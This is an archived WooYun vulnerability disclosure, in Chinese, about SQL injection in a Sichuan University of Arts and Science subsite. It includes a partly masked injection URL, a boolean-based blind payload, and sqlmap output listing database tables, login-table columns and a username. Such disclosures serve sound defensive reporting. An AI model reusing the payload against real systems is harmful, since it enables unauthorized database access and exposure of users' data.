乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-18: 厂商已经确认,细节仅向厂商公开 2016-01-28: 细节向核心白帽子及相关领域专家公开 2016-02-07: 细节向普通白帽子公开 2016-02-17: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
四川文理学院某分站存在sql注入漏洞,还有其他注入点。
注入点:
http://**.**.**.**/infolist.asp?big=%B2%BF%C3%C5%B8%C5%BF%F6
Place: GETParameter: big Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: big=%B2%BF%C3%C5%B8%C5%BF%F6' AND 8370=8370 AND 'KjvM'='KjvMweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb[6 tables]+------------+| config || file || guanliyuan || info || login || vote |+------------+
Database: Microsoft_Access_masterdbTable: login[4 columns]+--------+-------------+| Column | Type |+--------+-------------+| id | numeric || ip | non-numeric || url | non-numeric || yhm | non-numeric |+--------+-------------+
Database: Microsoft_Access_masterdbTable: login[1 entry]+----+-----------+-----+--------+| id | ip | url | yhm |+----+-----------+-----+--------+| 1 | **.**.**.** | <blank> | ygsanm |+----+-----------+-----+--------+
过滤。。。
危害等级:中
漏洞Rank:6
确认时间:2016-01-18 08:30
通知处理中
暂无